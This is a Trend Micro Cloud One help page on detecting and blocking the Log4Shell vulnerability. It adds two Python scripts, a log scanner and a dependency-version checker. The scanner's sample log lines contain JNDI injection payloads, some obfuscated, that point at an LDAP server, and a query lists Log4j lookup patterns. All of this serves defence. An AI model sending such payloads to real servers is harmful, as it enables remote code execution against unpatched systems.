Trend Micro Cloud One coverage of Log4j vulnerability

On December 9, 2021, a new critical zero-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed. If exploited, this vulnerability could result in Remote Code Execution (RCE): an attacker only needs to get a specially crafted string logged by an affected installation. This specific vulnerability has been assigned CVE-2021-44228 and is also being commonly referred to as "Log4Shell" in various blogs and reports.

Trend Micro Cloud One provides extensive coverage for this new vulnerability throughout your environment:

  • Prevent attacks on your computers by virtually patching the vulnerability with Workload Security. Workload Security also provides a Log Inspection rule for detecting the attack, and Anti-Malware capabilities for detecting and preventing an attack.
  • Prevent denial of service attacks and JNDI injection/look-ups using Network Security.
  • Prevent attacks on running applications by monitoring them with Application Security, which stops unexpected shell commands from executing.
  • Identify vulnerable versions of the log4j library across your organization's source code repositories and monitor progress on updating to non-vulnerable versions using Open Source Security by Snyk.
  • Detect container images that have Log4j with Container Security.
  • Use Conformity to check for Log4j in your cloud environment.

Watch a video showing how Trend Micro Cloud One protects against this vulnerability. We also have a growing list of Trend Micro resources about this issue.


Workload Security

Workload Security provides Intrusion Prevention rules that focus on preventing the attack using virtual patching, a Log Inspection rule for detecting the attack, and Anti-Malware capabilities for detecting and preventing an attack.

For detailed information on how to make sure you're covered, see Workload Security coverage of Log4j vulnerability.

Workload Security includes the Intrusion Prevention module (IPS), which protects your computers from attacks on zero-day vulnerabilities and other threats. Intrusion Prevention rules provide "virtual patching" by intercepting traffic that tries to exploit a vulnerability, protecting your workloads until the vendor's patch for the vulnerability is released, tested, and deployed.

The Trend Micro Labs team has provided a new IPS rule to address this vulnerability:

1011242 - Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Apply virtual patching for the Log4j vulnerability

Follow the steps below to check whether the new rule is protecting your workloads.

  1. In the Workload Security console, go to Administration > Updates > Security > Rules.

  2. The new rule is included in 21-057.dsru. Check that the rule update is shown as Applied.

    Rule Updates page

    Details for DSRU 21-057

  3. If the rule isn't applied, run a recommendation scan. We suggest that you create a 'run once' scheduled task and select the Run Task on 'Finish' option.

    Recommendation scan scheduled task

  4. To ensure that the rule gets applied wherever it's recommended, open the policy that is assigned to the computers you just scanned, go to Intrusion Prevention > General, and search for rule 1011242. Select the checkbox next to the rule name to assign it to the policy. All computers protected by this policy will have the rule applied to them.

    If applications listen on non-default ports, update the rule's port list so that traffic on those ports is inspected.

  5. Intrusion Prevention operates in either Detect or Prevent mode. Detect mode generates events about rule violations but doesn't block traffic. Prevent mode generates events and blocks traffic that matches rules, to prevent attacks. To set Prevent mode, open the computer or policy editor, go to Intrusion Prevention > General and set Intrusion Prevention Behavior to Prevent. Click Save.

Apply the IPS rule without running a recommendation scan

If you don't want to run a recommendation scan, you can apply the rule directly to the base policy.

  1. In the Workload Security console, go to Policies.
  2. Double-click the Base Policy to display the policy details.
  3. Select Intrusion Prevention.
  4. On the General tab, ensure that Intrusion Prevention State is set to On and Intrusion Prevention Behavior is set to Prevent.
  5. In the Assigned Intrusion Prevention Rules section, select Assign/Unassign. The IPS Rules page opens.
  6. Search for rule 1011242. Select the checkbox next to the rule name to assign it to the policy. Select OK.
  7. On the Base Policy page, select Save and ensure that the Mode for the rule is set to Prevent.

    Assigned Intrusion Prevention Rules

Identify potentially affected hosts

If you are also using Trend Micro Vision One, you can use the following query to identify hosts that may be affected by this vulnerability:

eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1005177) AND ("${" AND ("lower:" OR "upper:" OR "sys:" OR "env:" OR "java:" OR "jndi:"))

Use a Log Inspection rule to investigate activity

Trend Micro has provided a Log Inspection rule to help identify activity related to this vulnerability:

1011241 - Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Check the rule configuration to make sure the correct log file is being monitored. The rule watches /var/log/*/access.log by default; if your application's access log is elsewhere, add its path to the rule configuration.

You can also create a custom Log Inspection rule to detect patterns that are discovered in the future. For details, see Custom Log Inspection Rules for Log4Shell Vulnerability on Trend Micro Cloud One - Workload Security and Deep Security.
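As an added example (not Trend Micro's rule content, and not the logic of the Vision One query or the Log Inspection rule above), the following Python script applies the same matching idea to web access log lines: it first resolves the nested lookups attackers use to hide the `${jndi:` prefix from a plain string match, then reports any `${` followed by one of the lookup prefixes the query lists (jndi, lower, upper, sys, env, java). The log lines are constructed samples, and the function names are the example's own.

```python
"""Detect Log4Shell-style lookup strings in web access log lines.

Added example, not Trend Micro's rule logic. Mirrors what the Vision One
query and Log Inspection rule look for: a "${" followed by a lookup
prefix, including the nested obfuscations used to hide "${jndi:".
The log lines below are constructed samples, not real traffic.
"""
from __future__ import annotations

import re

LOOKUP_PREFIXES = ("jndi:", "lower:", "upper:", "sys:", "env:", "java:")

# Innermost lookups that Log4j would collapse to plain text before the
# outer lookup is evaluated:
#   ${lower:X} / ${upper:X}   -> case-changed X
#   ${anything:-X}            -> default value X (e.g. ${::-j}, ${env:NaN:-j})
_INNER = re.compile(
    r"\$\{\s*(lower|upper)\s*:\s*([^{}]*)\}"
    r"|\$\{[^{}]*?:-([^{}]*)\}",
    re.IGNORECASE,
)


def _resolve(m: re.Match) -> str:
    kind, text, default = m.group(1), m.group(2), m.group(3)
    if kind:
        return text.lower() if kind.lower() == "lower" else text.upper()
    return default


def normalize(s: str) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    prev = None
    while prev != s:
        prev = s
        s = _INNER.sub(_resolve, s)
    return s


def find_lookups(line: str) -> list[str]:
    """Lookup prefixes found in the line after de-obfuscation (empty if clean)."""
    flat = normalize(line)
    hits = []
    for m in re.finditer(r"\$\{\s*([a-z]+:)", flat, re.IGNORECASE):
        prefix = m.group(1).lower()
        if prefix in LOOKUP_PREFIXES:
            hits.append(prefix)
    return hits


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """(line number, prefixes) for every line that carries a lookup."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = find_lookups(line)
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample access log lines (combined log format). Lines 2-4 carry
# a direct, a partially nested and a fully nested jndi lookup in the
# User-Agent or URI; line 5 carries an env lookup; lines 1 and 6 are benign
# (line 6 shows a "${...}" with no lookup prefix, which must not fire).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET /${${lower:j}ndi:ldap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/c}"',
    '10.0.0.12 - - [10/Dec/2021:03:14:15 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '10.0.0.13 - - [10/Dec/2021:03:14:16 +0000] "GET /price?amount=${amount} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: lookup prefixes {hits}")
```

Lines 1 and 6 produce nothing, lines 2 to 4 all report `jndi:` once the nesting is collapsed, and line 5 reports `env:`. Matching on the resolved string rather than on the literal `${jndi:` is the point: the same obfuscations defeat a naive grep, which is why the Vision One query above keys on `${` plus the family of lookup prefixes rather than on `jndi` alone.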


Network Security

Network Security provides a filter that helps to prevent attacks. It also provides additional controls that can be used to disrupt the attack chain, like Geolocation filtering to block regions and anonymous proxies, and Domain Filtering to prevent unsanctioned access to domains not on a permit list.

The Network Security filter that helps to prevent attacks is Filter 40627: HTTP: JNDI Injection in HTTP Header or URI, released in Digital Vaccine #9621. The filter addresses denial-of-service abuse of this vulnerability and also blocks JNDI injection and lookups.

We recommend that you enable this filter in a block and notify posture for optimal coverage. Starting with Digital Vaccines released on 12/21/2021, it will be enabled by default. Since it may not be enabled in your environment, we strongly recommend that you confirm the filter is enabled in your policy. See the Network Security documentation for information about filters and how to add cloud accounts and appliances.

Network Security also provides additional controls to disrupt the attack chain, described in the next section.

Other Network Security controls that can disrupt the attack

The attack succeeds only when the injected lookup causes the vulnerable host to reach out and fetch a malicious payload from an attacker-controlled server. In addition to the filter described above, these techniques can help break that chain:

  • Use Geolocation filtering to reduce possible attack vectors. Geolocation filtering can block inbound and outbound connections to any specified country, which may limit the ability for attackers to exploit the environment. In cases where a business only operates in certain regions of the globe, proactively blocking other countries may be advisable. Learn about geolocation filtering.
  • Anonymous proxies are also an independent, configurable “region” that can be selected as part of Geolocation filtering. This will block any inbound or outbound connection to/from an anonymous proxy or anonymizer service, which can be commonly used as part of exploit attempts.
  • Use domain filtering to limit the attack vectors and disrupt the attack chain used to exploit this vulnerability. In this case, any outbound connection over TCP is dropped unless the domain being accessed is on a permit list. If the attacker’s domain, e.g. http://attacker.com, is not on the permit list, then it would be blocked by default, regardless of IPS filter policy. Learn about domain filtering.

Identify potentially affected hosts

With Network Security, you can also use Filters 40641: HTTP: Worm.Shell.Tsunami.B Runtime Detection and 40643: TCP: Trojan.Linux.Sonawatsi.A Runtime Detection to locate indicators of Log4j-associated malware and ransomware that our threat research team has identified as actively circulating. If you receive an alert or event associated with these filters, take action immediately: prioritize triaging the affected hosts, as this may indicate a Log4j-associated compromise.


Application Security

Application Security can monitor running applications and stops unexpected shell commands from executing.

To help protect against certain exploits associated with this vulnerability:

  1. Open the Application Security console and, in the left menu bar, select the Group Policy icon.
  2. Find your application's group.
  3. Select Remote Command Execution, if it isn't already selected.
  4. In the right pane, select the Configure Policy icon.
  5. Select < INSERT RULE >.
  6. In Enter a pattern to match, enter (?s).* and select Submit, then Save Changes.
  7. Check that "Mitigate" is selected in your "Remote Command Execution" line item.

  The pattern (?s).* matches any command, including multi-line ones, so with Mitigate selected every shell command the application tries to spawn is blocked. Confirm that the application does not legitimately execute shell commands before applying it; if it does, use a pattern that matches only the commands you want to block.

A blocked exploit attempt looks like this:

Blocked exploit attempt


Open Source Security by Snyk

Open Source Security by Snyk can identify vulnerable versions of the log4j library across your organization's source code repositories with very little integration effort. Once installed, it can also monitor progress on updating to non-vulnerable versions.

OSS by Snyk Log4j detection
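To show the kind of comparison such a dependency scan makes, here is an added Python example (not Snyk's or Trend Micro's scanner logic). It finds the declared log4j-core version in a Maven pom.xml, resolves property references, and checks it against the release that fixed CVE-2021-44228 on its branch. The thresholds are the Apache fix releases for this CVE (2.15.0 for the main line, with 2.12.2 and 2.3.1 as the Java 7 and Java 6 backports); 2.15.0 was superseded within days by 2.16.0 and later releases for follow-on CVEs, so treat them as a floor, not an upgrade target. The pom.xml and all names are constructed for the example.

```python
"""Classify declared log4j-core versions against the fix releases for
CVE-2021-44228.

Added example, not Snyk's or Trend Micro's own scanner logic. It shows the
comparison a dependency scan performs on a repository's declared
dependencies: find log4j-core in a Maven pom.xml, resolve property
references, and compare the version against the fix for its branch.
The pom below is a constructed sample.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Apache releases that closed CVE-2021-44228, per branch (assumed here as
# the thresholds; later releases fixed follow-on CVEs, so upgrade beyond them).
FIXED_BY_BRANCH = {
    (2, 3): (2, 3, 1),    # Java 6 backport
    (2, 12): (2, 12, 2),  # Java 7 backport
}
FIXED_MAIN = (2, 15, 0)   # every other 2.x line


def parse_version(version: str) -> tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.3' -> (2, 3, 0).
    Pre-release qualifiers such as '-beta9' are dropped, which errs on the
    side of flagging early betas."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    major, minor, patch = (int(x or 0) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable(version: str) -> bool:
    """True if this log4j-core version predates the fix for its branch."""
    v = parse_version(version)
    if v[0] != 2:
        return False  # log4j 1.x is end-of-life but not affected by this CVE
    fixed = FIXED_BY_BRANCH.get((v[0], v[1]), FIXED_MAIN)
    return v < fixed


def _local(tag: str) -> str:
    """Strip the Maven XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def log4j_core_versions(pom_xml: str) -> list[str]:
    """Declared versions of org.apache.logging.log4j:log4j-core in a pom,
    with ${property} references resolved from <properties>."""
    root = ET.fromstring(pom_xml)
    props: dict[str, str] = {}
    for el in root.iter():
        if _local(el.tag) == "properties":
            props.update({_local(p.tag): (p.text or "").strip() for p in el})
    versions = []
    for dep in root.iter():
        if _local(dep.tag) != "dependency":
            continue
        f = {_local(c.tag): (c.text or "").strip() for c in dep}
        if f.get("groupId") == "org.apache.logging.log4j" and f.get("artifactId") == "log4j-core":
            v = re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), m.group(0)),
                       f.get("version", ""))
            versions.append(v)
    return versions


def audit_pom(pom_xml: str) -> list[tuple[str, bool | None]]:
    """(version, vulnerable) per log4j-core dependency; None when the version
    is missing or unresolved (e.g. managed by a parent POM or BOM)."""
    out: list[tuple[str, bool | None]] = []
    for v in log4j_core_versions(pom_xml):
        if not v or "${" in v:
            out.append((v or "<unresolved>", None))
        else:
            out.append((v, is_vulnerable(v)))
    return out


# Constructed sample: a service pinning log4j 2.14.1 through a property.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.example</groupId>
  <artifactId>orders-service</artifactId>
  <version>1.0.0</version>
  <properties>
    <log4j.version>2.14.1</log4j.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>${log4j.version}</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
  </dependencies>
</project>
"""

if __name__ == "__main__":
    for version, vulnerable in audit_pom(SAMPLE_POM):
        print(f"log4j-core {version}: {'VULNERABLE' if vulnerable else vulnerable}")
```

A check like this covers only what a single pom declares. It misses log4j-core pulled in transitively by another dependency, versions managed in a parent POM or BOM (reported as unresolved above), and copies shaded into fat jars, which is why a scanner that resolves the full dependency graph, as the page describes, is the right tool for an organization-wide inventory.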


Container Security

Container Security detects container images that have Log4j.

To protect your containers:

  1. Scan all of your images with a Deep Security Smart Check that is registered in Container Security.
  2. Set a Container Security policy.

    The policy should block the deployment of both unscanned images and images that contain critical vulnerabilities:

    Policy that blocks unscanned images and critical vulnerabilities

    It should also terminate the running of both unscanned images and images that contain critical vulnerabilities:

    Policy that terminates unscanned images and critical vulnerabilities

    Terminating unscanned images will terminate all images that haven't been scanned, including items not specific to Log4j.


Conformity

Conformity provides central visibility and real-time monitoring of your cloud infrastructure by enabling you to auto-check against nearly 1000 cloud service configuration best practices across 90+ services and avoid cloud service misconfigurations.

Conformity provides the following rules to check for Log4j. See Rules configuration for instructions on how to configure rules.


More resources from Trend Micro about this vulnerability